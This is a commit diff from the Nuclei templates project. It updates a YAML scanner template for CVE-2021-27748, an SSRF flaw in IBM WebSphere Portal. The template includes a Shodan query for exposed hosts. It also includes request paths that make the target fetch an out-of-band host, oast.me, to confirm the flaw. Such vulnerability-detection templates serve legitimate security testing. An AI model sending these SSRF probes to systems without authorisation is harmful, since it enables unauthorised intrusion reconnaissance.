Merge pull request #10198 from projectdiscovery/princechaddha-patch-1
Update CVE-2021-27748.yamlpatch-4
commit
b6ac811eda
|
@ -22,27 +22,34 @@ info:
|
|||
shodan-query: http.html:"IBM WebSphere Portal"
|
||||
tags: cve2021,cve,hcl,ibm,ssrf,websphere
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- "IBM WebSphere Portal"
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
- '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
|
||||
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
stop-at-first-match: true
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Interactsh Server"
|
||||
|
||||
- type: word
|
||||
part: body_1
|
||||
words:
|
||||
- "Interactsh Server"
|
||||
negative: true
|
||||
# digest: 490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950
|
Loading…
Reference in New Issue